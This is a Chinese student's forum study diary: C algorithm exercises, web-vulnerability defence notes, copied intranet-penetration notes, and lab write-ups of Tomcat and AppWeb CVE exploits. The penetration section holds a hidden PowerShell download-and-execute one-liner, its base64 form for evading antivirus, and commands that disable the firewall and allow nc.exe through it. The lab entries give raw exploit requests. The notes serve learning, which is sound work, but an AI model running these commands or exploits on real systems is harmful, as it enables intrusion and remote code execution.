马鹏雲的学习日记

sandalwood · 发表于 2021-10-25 22:27:07

今天课比较多，就写了几个C语言的代码（可能比较简单，但是确实是好久没写了，感觉手生了）：
# 两数之和

给定一个整数数组 nums 和一个整数目标值 target，请你在该数组中找出和为目标值 target  的那两个整数，并返回它们的数组下标。

你可以假设每种输入只会对应一个答案。但是，数组中同一个元素在答案里不能重复出现。

```c
/**
* Note: The returned array must be malloced, assume caller calls free().
*/
int* twoSum(int* nums, int numsSize, int target, int* returnSize)
//给定一个整数数组 nums 和一个整数目标值 target，请你在该数组中找出和为目标值 target  的那两个整数，并返回它们的数组下标。
{
int i,j;
int *result=NULL;
*returnSize=2;
for(i=0;i<numsSize-1;i++)
{
      for(j=i+1;j<numsSize;j++)//数组中的元素在答案中不能重复出现,因此直接从i后面的元素查找
      {
         if(nums[i]+nums[j]==target)
         {
               result=(int*)malloc(sizeof(int)*2);//sizeof(node)表示获取node类型的长度，malloc(sizeof(node))表示在内存中申请一个node长度的空间（即一个空结点）
            //molloc是在<stdlib.h>的标准库中
               result[0]=i;
               result[1]=j;
               return result;
         }
      }
}
return result;//找不到结果，所以返回为空
}
```

# 整数反转

> 给你一个 32 位的有符号整数 x ，返回将 x 中的数字部分反转后的结果。
>
> 如果反转后整数超过 32 位的有符号整数的范围 [−231,  231 − 1] ，就返回 0。
> 假设环境不允许存储 64 位整数（有符号或无符号）。

```c
int reverse(int x){
long mod,result=0;;
if(x>1534236461) return 0;

while(x){
      mod=x%10;
      x=x/10;
      result=result*10+mod;
}

if(result>2147483642||result<(-2147483641)) return 0;
return result;
}
```

# 回文数

> 给你一个整数 x ，如果 x 是一个回文整数，返回 true ；否则，返回 false 。
>
> 回文数是指正序（从左向右）和倒序（从右向左）读都是一样的整数。例如，121 是回文，而 123 不是。

```c
bool isPalindrome(int x){
int a[20],i,j;
if(x<0) return false;
for(i=0;x!=0;i++)
{
a[i]=x%10;
x=x/10;
}
for(j=0;j<i/2;j++)
{
if(a[j]!=a[i-j-1]) return false;
}
return true;
}
```

#

sandalwood · 发表于 2021-10-26 22:40:15

一篇今天的阅读摘抄：
## 十大常见web漏洞（防范措施）

**https://www.cnblogs.com/yzloo/p/10391067.html**

### SQL注入

（1）所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
  （2）对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。
  （3）确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。
  （4）数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
  （5）网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
  （6）严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
  （7）避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
  （8）在网站发布之前建议使用一些专业的SQL注入检测工具进行检测，及时修补这些SQL注入漏洞。

## 跨站脚本漏洞（XSS）

（1）与SQL注入防护的建议一样，假定所有输入都是可疑的，必须对所有输入中的script、iframe等字样进行严格的检查。这里的输入不仅仅是用户可以直接交互的输入接口，也包括HTTP请求中的Cookie中的变量，HTTP请求头部中的变量等。
  （2）不仅要验证数据的类型，还要验证其格式、长度、范围和内容。
  （3）不要仅仅在客户端做数据的验证与过滤，关键的过滤步骤在服务端进行。
  （4）对输出的数据也要检查，数据库里的值有可能会在一个大网站的多处都有输出，即使在输入做了编码等操作，在各处的输出点时也要进行安全检查。
  （5）在发布应用程序之前测试所有已知的威胁。

### 弱口令

1. 尽量不使用习惯的密码即可
2. 规定组合方式以及密码长度

### **HTTP报头追踪漏洞** （纯引用）

HTTP/1.1（RFC2616）规范定义了HTTP  TRACE方法，主要是用于客户端通过向Web服务器提交TRACE请求来进行测试或获得诊断信息。当Web服务器启用TRACE时，提交的请求头会在服务器响应的内容（Body）中完整的返回，其中HTTP头很可能包括Session  Token、Cookies或其它认证信息。攻击者可以利用此漏洞来欺骗合法用户并得到他们的私人信息。该漏洞往往与其它方式配合来进行有效攻击，由于HTTP TRACE请求可以通过客户浏览器脚本发起（如XMLHttpRequest），并可以通过DOM接口来访问，因此很容易被攻击者利用。
防御HTTP报头追踪漏洞的方法通常禁用HTTP TRACE方法。

### **Struts2远程命令执行漏洞**

ApacheStruts是一款建立Java web应用程序的开放源代码架构。Apache Struts存在一个输入过滤错误，如果遇到转换错误可被利用注入和执行任意Java代码。
网站存在远程代码执行漏洞的大部分原因是由于网站采用了Apache Struts  Xwork作为网站应用框架，由于该软件存在远程代码执高危漏洞，导致网站面临安全风险。CNVD处置过诸多此类漏洞，例如：“GPS车载卫星定位系统”网站存在远程命令执行漏洞(CNVD-2012-13934)；Aspcms留言本远程代码执行漏洞（CNVD-2012-11590）等。
修复此类漏洞，只需到Apache官网升级Apache Struts到最新版本：http://struts.apache.org

### 文件上传

限制文件的类型、大小；

对用户的权限做好限制；

### 私有IP地址泄露

防止被直接ping通

安装能够自动去掉发送数据包包头IP信息的一些软件。不过使用这些软件有些缺点，譬如：耗费资源严重，降低计算机性能；访问一些论坛或者网站时会受影响；不适合网吧用户使用等等。

现在的个人用户采用最普及隐藏IP的方法应该是使用代理，由于使用代理服务器后，“转址服务”会对发送出去的数据包有所修改，致使“数据包分析”的方法失效。

### 未加密登录请求

对用户名和密码进行加密后传输，不用明文传输

### 目录遍历

限制用户在URL中或在有特殊意义的目录中附加“../”、或者附加“../”的一些变型（如“..\”或“..//”甚至其编码）

### 命令执行

限制用户提交的字符或者命令

sandalwood · 发表于 2021-10-28 21:54:05

这两天在写数据结构的作业，然后看了一部分的文章，摘抄如下：
## 内网学习笔记合集

https://teamssix.com/211027-163641.html

### 常见名词解释

#### 工作组

工作组（work group）是最常见最简单最普通的资源管理模式，就是将不同的电脑按照功能分别列入不同的组中，以方便管理。并且在工作组中的所有计算机都是平等的，没有管理与被管理之分，因此工作组的网络也被称为对等网络。所有工作组的管理方式对于管理者而言会不便于管理。

#### 域

##### 域

域（domain）可以简单理解为工作组的升级版，在域的模式下，至少有一台服务器负责每一台连入网络的电脑和用户的验证工作，相当于门卫一样，被称为域控制器。

##### 域控制器

域控制器（domain controller），简称DC，域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。

当电脑连入网络时，域控制器首先要鉴别这台电脑是否是属于这个域的，用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确的，那么域控制器就会拒绝这个用户从这台电脑登录。不能登录，用户就不能访问服务器上有权限保护的资源，这样就在一定程度上保护了网络上的资源。

正是因为域控起到了一个身份验证的作用，因此站在渗透的角度来说，拿下域控是至关重要的。拿下了域控，就相当于拿到了整个域内所有计算机的账号和密码。

域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。

当电脑连入网络时，域控制器首先要鉴别这台电脑是否是属于这个域的，用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确的，那么域控制器就会拒绝这个用户从这台电脑登录。不能登录，用户就不能访问服务器上有权限保护的资源，这样就在一定程度上保护了网络上的资源。

正是因为域控起到了一个身份验证的作用，因此站在渗透的角度来说，拿下域控是至关重要的。拿下了域控，就相当于拿到了整个域内所有计算机的账号和密码。

##### 父域和子域

在一个域（A）下新建了一个域（B），B便是A的子域，A是B的父域。每个域中都有独立的安全策略

##### 域树

域树由多个域组成，这些域共享同一表结构和配置，形成一个连续的名字空间。

树中的域通过信任关系连接起来，活动目录包含一个或多个域树。域树中的域层次越深级别越低，一个“.”代表一个层次，如域child.Microsoft.com 就比 Microsoft.com这个域级别低，因为它有两个层次关系，而Microsoft.com只有一个层次。

而域Grandchild.Child.Microsoft.com又比 Child.Microsoft.com级别低，道理一样。他们都属于同一个域树。Child.Microsoft.com就属于Microsoft.com的子域。

多个域树可以组成一个域林。

##### 域林

域林是指由一个或多个没有形成连续名字空间的域树组成，它与域树最明显的区别就在于域林之间没有形成连续的名字空间，而域树则是由一些具有连续名字空间的域组成。

但域林中的所有域树仍共享同一个表结构、配置和全局目录。域林中的所有域树通过Kerberos  信任关系建立起来，所以每个域树都知道Kerberos信任关系，不同域树可以交叉引用其他域树中的对象。域林都有根域，域林的根域是域林中创建的第一个域，域林中所有域树的根域与域林的根域建立可传递的信任关系.

比如benet.com.cn,则可以创建同属与一个林的accp.com.cn,他们就在同一个域林里.

当创建第一个域控制器的时候，就创建了第一个域（也称林根域），和第一个林。

林，是一个或多个共享公共架构和全局编录的域组成，每个域都有单独的安全策略，和与其他域的信任关系。一个单位可以有多个林。

![图片](https://mmbiz.qpic.cn/mmbiz_png/ ... _lazy=1&wx_co=1)

#### 活动目录

活动目录（`Active Directory），简写为AD，它是 Windows Server 中负责架构中大型网络环境的集中式目录管理服务，在Windows 2000 Server 开始内置于 Windows Server 产品中。

目录包含了有关各种对象，例如用户、用户组、计算机、域、组织单位（OU）以及安全策略的信息。目录存储在域控上，并且可以被网络应用程序或者服务所访问。

活动目录就相当于内网中各种资源的一个目录，通过活动目录用户可以快速定位到这些资源的位置。

#### DMZ

DMZ `demilitarized zone` ，中文名为“隔离区”，或称“非军事化区”。它是为了解决安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题，从而设立的一个非安全系统与安全系统之间的缓冲区。

DMZ 区可以理解为一个不同于外网或内网的特殊网络区域，DMZ 内通常放置一些不含机密信息的公用服务器，比如 WEB 服务器、E-Mail  服务器、FTP 服务器等。这样来自外网的访问者只可以访问 DMZ 中的服务，但不可能接触到存放在内网中的信息等，即使 DMZ  中服务器受到破坏，也不会对内网中的信息造成影响。

#### 域内的各种权限

首先要理解一下组的概念，在组里包含了很多用户，当管理员想要给某个用户分配权限时，只需要将用户加入到对应权限的组里就行，从而提高了管理效率，常见的组有：域本地组、全局组、通用组。

##### 域本地组（DL）

成员范围：所有的域；

使用范围：自己所在的域

##### 全局（G）

成员范围：自己所在的域；

使用范围：所有的域

##### 通用组（U）

成员范围：所有的域；

使用范围：所有的域

##### A-G-DL-P 策略

A-G-DL-P 策略是将用户账号添加到全局组中，将全局组添加到域本地组中，然后为域本地组分配资源权限。

- **A 表示用户账号**
- G 表示全局组
- U 表示通用组
- DL 表示域本地组
- **P 表示资源权限**

### PowerShell

#### 简介

PowerShell 可以简单的理解为 cmd 的高级版，cmd 能做的事在 PowerShell 中都能做，但 PowerShell 还能做很多 cmd 不能做的事情。

PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中，同时 PowerShell 是构建在 .NET 平台上的，所有命令传递的都是 .NET 对象。

PowerShell 有如下特点：

- **Windows 7 以上**的操作系统默认安装
- **PowerShell 脚本可以运行在内存中**，不需要写入磁盘
- 可以从另一个系统中下载 PowerShell 脚本并执行
- 目前很多工具都是基于 PowerShell 开发的
- 很多安全软件检测不到 PowerShell 的活动
- **cmd 通常会被阻止运行，但是 PowerShell 不会**（感觉这就很有意思了，感觉可以直接运行目标的powershell来操作）
- 可以用来**管理活动目录**

可输入 Get-Host 或者 $PSVersionTable 查看 PowerShell 版本：

![image-20211028200807757](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028200807757.png)

```
PS C:\Users\teamssix> Get-Host

Name          : ConsoleHost
Version       : 5.1.18362.1171
InstanceId    : a0a6f8f2-f86a-477f-bf4b-b94b452bee3c
UI             : System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture : zh-CN
CurrentUICulture : zh-CN
PrivateData    : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
DebuggerEnabled  : True
IsRunspacePushed : False
Runspace       : System.Management.Automation.Runspaces.LocalRunspace

PS C:\Users\teamssix> $PSVersionTable

Name                         Value
----                         -----
PSVersion                   5.1.18362.1171
PSEdition                   Desktop
PSCompatibleVersions          {1.0, 2.0, 3.0, 4.0...}
BuildVersion                10.0.18362.1171
CLRVersion                   4.0.30319.42000
WSManStackVersion             3.0
PSRemotingProtocolVersion    2.3
SerializationVersion          1.1.0.1
```

Windows 操作系统对应的 PowerShell 版本信息：

1.0    windows server 2008

2.0    windows server 2008 r2、windows 7

3.0    windows server 2012、windows 8

4.0    windows server 2012 r2、windows 8.1

5.0    windows 10

5.1    windows server 2016

#### 基本概念

##### ps1 文件

ps1 是PowerShell 的**脚本扩展名**，一个 PowerShell 脚本文件其实就是一个简单的文本文件。

##### 执行策略

为了防止恶意脚本在 PowerShell 中被运行，PowerShell 有个执行策略，默认情况下，这个执行策略是受限模式`Restricted`。

使用 `Get-ExecutionPolicy`命令查看当前执行策略

```
PS C:\Users\teamssix> Get-ExecutionPolicy
Restricted
```

![image-20211028201847419](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028201847419.png)

执行策略有以下几种：

**Restricted**：不能运行脚本

**RemoteSigned**：本地创建的脚本可以运行，但从网上下载的脚本不能运行（除非它们拥有由受信任的发布者签署的数字签名）

**AllSigned**：仅当脚本由受信任的发布者签名才能运行。

**Unrestricted**：脚本执行不受限制，不管来自哪里，也不管它们是否有签名。

使用`**Set-ExecutionPolicy <policy name>**`设置执行策略，该命令**需要管理员权限**

```
PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted

执行策略更改
执行策略可帮助你防止执行不信任的脚本。更改执行策略可能会产生安全风险，如 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies 帮助主题所述。是否要更改执行策略?
[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): A

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Unrestricted
```

##### 运行脚本

PowerShell 运行脚本的方式和其他 shell 基本一致，可以输入完整路径运行，也可以到 ps1 文件所在目录下去运行，具体如下：

```
PS C:\Users\teamssix> C:\t.ps1
hello TeamsSix

PS C:\Users\teamssix> cd C:\

PS C:\> .\t.ps1
hello TeamsSix
```

> 这里不禁想吐槽一下，在看百度百科的时候关于 PowerShell 运行脚本的描述是这样的：“假设你要运行一个名为a.ps1的脚本，你可以键入  C:\Scripts\aps1，最大的例外是，**如果 PowerShell  脚本文件刚好位于你的系统目录中，那么你可以直接在命令提示符命令提示符后键入脚本文件名即可运行**”
>
> 这里的“系统目录”是指的啥目录？C:\还是C:\windows\system目录，“最大的例外”又是什么鬼，讲道理读起来有一种机翻的感觉。

##### 管道

PowerShell 中的管道类似于 linux 中的管道，都是将前一个命令的输出作为另一个命令的输入，两个命令之间使用 “|” 进行连接。

例如，在 PowerShell 中获取进程信息并以程序 ID 进行排序

```
PS C:\> Get-Process | Sort-Object ID

Handles  NPM(K) PM(K)    WS(K)    CPU(s)    Id  SI ProcessName
-------  ------ -----    -----    ------    --  -- -----------
   0    0    60       8                0 0 Idle
3038    0    208    4760                4 0 System
   0    12    7732    81344             88 0 Registry
   53    3    1160       752             368 0 smss
256    10    2468    7424             424 0 svchost
662    21    1788    4668             504 0 csrss
160    11    1364    5660             580 0 wininit
653    27 18592    177580             588 1 csrss
1219    67 59660       52    2.59 600 1 WinStore.App
278    14    3108    15656             684 1 winlogon
687    11    5420    9432             724 0 services
```

![image-20211028202349951](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028202349951.png)

最开始的时候，打错了，打成了Get-Process | Sort-Object IP，得到如下结果（和Get-Process | Sort-Object ID 的结果看着很像，表头都一样，但是里面的数据不一样）：

![image-20211028202436509](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028202436509.png)

#### 命令

> -NoLogo：启动不显示版权标志的PowerShell
>
> -WindowStyle Hidden (-W Hidden)：隐藏窗口
>
> -NoProfile (-NoP)：不加载当前用户的配置文件
>
> –Enc：执行 base64 编码后的 powershell 脚本字符串
>
> -ExecutionPolicy Bypass (-Exec Bypass) ：绕过执行安全策略
>
> -Noexit：执行后不退出Shell，这在使用键盘记录等脚本时非常重要
>
> -NonInteractive (-Nonl)：非交互模式，PowerShell 不为用户提供交互的提示

在 PowerShell 下，命令的命名规范很一致，都采用了动词-名词的形式，如 Net-Item，动词一般为  Add、New、Get、Remove、Set 等。PowerShell 还兼容 cmd 和 Linux 命令，如查看目录可以使用 dir 或者  ls 。

##### 绕过本地权限并执行

上面说到了默认情况下 PowerShell 的执行策略是受限模式`Restricted`，这就导致了在渗透测试过程中我们需要采用一些方法绕过这个策略，从而执行我们的脚本文件。

先来看看默认受限模式下执行脚本的情况

```
PS C:\Users\teamssix> powerShell.exe Get-ExecutionPolicy
Restricted

PS C:\Users\teamssix> PowerShell.exe -File t.ps1
无法加载文件 C:\Users\teamssix\t.ps1，因为在此系统上禁止运行脚本。有关详细信息，请参阅 https:/go.microsoft.com/fwlink/?
LinkID=135170 中的 about_Execution_Policies。+ CategoryInfo       : SecurityError: (

[]，ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnauthorizedAccess
```

这里系统会提示在此系统上禁止运行脚本，但加上 `-ExecutionPolicy Bypass`即可绕过这个限制

```
PS C:\Users\teamssix> cat .\t.ps1echo "Hello TeamsSix"

S C:\Users\teamssix> PowerShell.exe -ExecutionPolicy Bypass -File t.ps1hello TeamsSix
```

##### 绕过本地权限并隐藏执行

**加入`-WindowStyle Hidden -NoLogo -NonInteractive -NoProfile` 即可隐藏执行。**

```
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File t.ps1
```

##### 下载远程脚本绕过权限并隐藏执行

```
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile "IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')"
```

或者简写

```
PowerShell.exe -Exec Bypass -W Hidden -NoLogo -NonI -NoP "IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')"
```

##### 利用 Base64 对命令进行编码

使用 Base64 进行编码主要是为了混淆代码以避免被杀毒软件查杀，经过尝试这里直接使用 Base64 编码是不行的，可以使用 Github 上的一个编码工具，工具下载地址：

https://raw.githubusercontent.co ... aster/ps_encoder.py

下载好后，需要先将要执行的命令保存到文本文件中，这里保存到了 tmp.txt 文本中，之后执行 `python ps_encoder.py -s tmp.txt` 即可

```
>cat tmp.txtIEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')>python ps_encoder.py -s tmp.txtSQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQA2AC4AMgAxADQALgAxADoAOAAwADAAMAAvAHQALgBwAHMAMQAnACkA
```

使用 –Enc 指定 Base64 编码内容

```
PowerShell.exe -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQA2AC4AMgAxADQALgAxADoAOAAwADAAMAAvAHQALgBwAHMAMQAnACkA
```

![图片](https://mmbiz.qpic.cn/mmbiz_png/ ... _lazy=1&wx_co=1)

### 本地工作组信息收集

#### 1、手动收集本地工作组信息

- 查看当前权限

```
whoami
```

![image-20211028205255561](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028205255561.png)

- 本机网络配置信息

```
ipconfig /all
```

![image-20211028205459945](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028205459945.png)

- 操作系统和版本信息（英文版）

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

感觉这个好像不好使，他就是加载了一下，啥也没有返回回来

![image-20211028205852886](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028205852886.png)

在网上找到应该是用：wmic os get caption

![image-20211028205930132](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028205930132.png)

- 操作系统和版本信息（中文版）

```
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
```

- 查看系统体系结构

```
wmic os get osarchitecture
```

![image-20211028211035452](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028211035452.png)

- 查看系统所有环境变量

```
Get-ChildItem env:
```

![image-20211028210639550](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028210639550.png)

- 查看安装的软件及版本和路径等信息

```
wmic product get name,version
```

![image-20211028211409502](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028211409502.png)

- 利用 PowerShell 收集软件版本信息

```
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
```

![image-20211028211532488](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028211532488.png)

- 查询本机服务信息

```
wmic service list brief
```

![image-20211028211718384](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028211718384.png)

- 查询进程列表

```
tasklist /v
```

![image-20211028211856987](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028211856987.png)

- wmic 查看进程信息

```
wmic process list brief
```

![image-20211028212413982](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212413982.png)

- 查看启动程序信息

```
wmic startup get command,caption
```

![image-20211028212052420](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212052420.png)

- 查看计划任务

```
schtasks /query /fo LIST /v
```

![image-20211028212503766](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212503766.png)

- 查看主机开启时间

```
net statistics workstation
```

![image-20211028212542301](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212542301.png)

- 查询用户列表

```
net user
```

![image-20211028212640592](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212640592.png)

- 查看指定用户的信息

```
net user teamssix
```

- 查看本地管理员用户

```
net localgroup administrators
```

![image-20211028212726174](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212726174.png)

- 查看当前在线用户

```
whoami
```

![image-20211028212932663](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212932663.png)

- 列出或断开本地计算机和连接的客户端的会话

```
net session
```

![image-20211028212953059](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028212953059.png)

- 查看端口列表

```
netstat –ano
```

![image-20211028213018668](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028213018668.png)

- 查看补丁列表

```
systeminfo
```

![image-20211028213100081](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028213100081.png)

- 使用 wmic 查看补丁列表

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

![image-20211028213221161](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028213221161.png)

- 查看本机共享

```
net share
```

![image-20211028213300141](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028213300141.png)

- 使用 wmic 查看共享列表

```
wmic share get name,path,status
```

![image-20211028214605200](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028214605200.png)

- 查询路由表及所有可用接口的ARP 缓存表

```
route printarp –a
```

![image-20211028214636497](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028214636497.png)

- 查询防火墙相关配置

```
netsh firewall set opmode disable (Windows Server 2003 系统及之前版本)netsh advfirewall set allprofiles state off (Windows Server 2003 系统之后版本)
```

```
netsh firewall show config
```

```
(Windows Server 2003 系统及之前版本)允许指定程序全部连接netsh firewall add allowedprogram c:\nc.exe "allow nc" enable(Windows Server 2003 之后系统版本)允许指定程序连入netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C: \nc.exe"允许指定程序连出netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C: \nc.exe"允许 3389 端口放行netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
```

```
netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
```

- - 自定义防火墙日志储存位置
- 修改防火墙配置
- 查看防火墙配置
- 关闭防火墙

- 查看计算机代理配置情况

```
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
```

![image-20211028214717768](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211028214717768.png)

- 查询并开启远程连接服务

```
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
```

```
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
```

```
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
```

- - 在Windows Server 2008 和Windows Server 2012 中开启3389 端口
- 在Windows Server 2003 中开启3389 端口
- 查看远程连接端口（0xd3d换成10进制即3389）

#### 2、自动收集本地工作组信息

##### wmic 脚本

wmic 脚本下载地址：https://www.fuzzysecurity.com/scripts/files/wmic_info.rar

直接将脚本在目标主机上运行，运行结束后会生成一个 output.html 文件

![图片](https://mmbiz.qpic.cn/mmbiz_png/ ... _lazy=1&wx_co=1)

##### PowerShsell Empire

PowerShsell Empire中文简称 “帝国” ，是一款针对 Windows 系统平台而打造的渗透工具，以下是 Empire 和万能的 MSF 的一些区别。

- MSF 是全平台的，无论是win，linux，mac都可以打，但 **Empire 是只针对 Windows 的**
- MSF 集信息收集，渗透，后渗透，木马，社工的功能为一体，全面多能；而 Empire 专注于内网渗透，它是针对 PowerShell 的

当使用 Empire 使主机上线后，可调用`powershell/situational_awareness/host/winenum`模块查看本机用户信息、系统基本信息、剪贴板等等信息。

![图片](https://mmbiz.qpic.cn/mmbiz_png/ ... _lazy=1&wx_co=1)

调用`powershell/situational_awareness/host/computerdetails`模块可查看更丰富的信息，比如RDP登录信息、主机时间日志等等，在运行这个模块时需要管理员权限。

sandalwood · 发表于 2021-10-29 22:12:40

## Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）

> 漏洞所需环境：
>
> Tomcat7.0.79（开启Put方法）
>
> Tomcat8.5.19
>
> JDK1.8.0

进入环境后发现很明显就是Tomcat的环境，![image-20211029151348827](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029151348827.png)

直接刷新页面，用burpsuite抓包，得到如下内容：

```
GET / HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0
```

![image-20211029151418395](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029151418395.png)

将数据包中的内容全部删除，修改为：

```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
```

点击forward后，访问URL：http://127.0.0.1:8080/1.jsp

得到如下页面：![image-20211029151637810](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029151637810.png)

页面信息如下（查看源代码）：

```
shell
```

证明这样可以向Tomcat的服务器写入文件

## AppWeb认证绕过漏洞（CVE-2018-8715）

访问对应的地址后得到如下的一个需要输入账号密码的弹窗：

![image-20211029191308045](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029191308045.png)

于是我在访问这个网址的时候打开burpsuite抓包，得到如下数据包：

```
GET / HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1
```

![image-20211029191936050](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029191936050.png)

将数据包发送到repeater模块中，将数据包修改为如下数据包（听说是已知了一个用户名为admin）：

记得一定要在最后空出来两行，不然是得不到session的

```
GET / HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin

```

![image-20211029192959508](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029192959508.png)

点击send后，可以在response中得到session：

```
Set-Cookie: -http-session-=1::http.session::da0004e344342117b375a45e643b6b4c; path=/; domain=127.0.0.1; httponly
```

将数据包中的内容修改为如下内容（将session添加进去）：

```
POST / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
-http-session-=1::http.session::da0004e344342117b375a45e643b6b4c
Authorization: Digest username=admin
Content-Length: 14

username=admin
```

点击forward后，不登录，就访问进去：

